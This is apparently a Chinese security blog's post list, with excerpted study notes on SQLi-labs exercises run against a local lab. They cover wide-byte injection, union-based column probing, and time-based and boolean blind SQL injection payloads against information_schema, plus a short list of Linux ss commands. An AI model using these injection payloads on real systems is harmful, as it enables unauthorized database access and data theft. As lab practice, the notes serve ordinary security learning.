- 博客(7)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Less-32宽字节注入练习
逃逸http://127.0.0.1/sqli/Less-32/?id=1%df' order by 400 -- + 注入条件: 要有宽字节注入漏洞 要满足目标程序使用双/多字节字符集进行解析其次不同字符集范围不一样,可能低位不包含单字节字符集的字符,这样就没办法了,所以要保证在该种字符集范围中包含低字节位,比如 0x5C(01011100) 的字符,即转义符\。 原理:一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字节(64-254)当设置gbk编.
2022-01-23 03:01:31
2420
原创 less-1:
1、通过 http://127.0.0.1/sqli/Less-1/?id=1' 报错 说明存在注入 2、通过http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- +判断闭合字符 为 ‘ 3.使用http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- + 二分法来判断列数 4.判断显示位 5.通过命令http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 unio
2022-01-23 03:00:38
225
原创 时间型盲注
1.求数据库名长度 andif(length(database())=8,sleep(5),1)--- 2.求数据库名对应的ASCII值 andif(ascii(substr((selectdatabase()),1,1))=115,sleep(5),1)--- 3.求表的数量 andif((selectcount(*)frominformation_schema.tableswheretable_schema='security')=4,sleep(5),1)--- ...
2022-01-23 02:58:54
579
原创 布尔型盲注
1.求闭合字符 2.求数据库名长度 andlength(database())=8%23 3.求当前数据库名对应的ASCII值 andascii(substr(database(),1,1))=115%23 4.求表的数量 and(selectcount(table_name)frominformation_schema.tableswheretable_schema='security')=4 %23 5.求表名的长度 and(selectlength(tabl...
2022-01-23 02:57:37
72
原创 Linux命令
1 ss ss -l显示本地打开的所有端口 ss -t -a 显示所有的tcp Socekt ss -u -a 显示所有的UDP Socekt ss -s 列出当前已经链接 关闭 等待的tcp连接 ss -I 列出当前监听端口 ss -pI 列出每个进程名以及器监听的端口 ...
2022-01-13 21:48:51
966
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人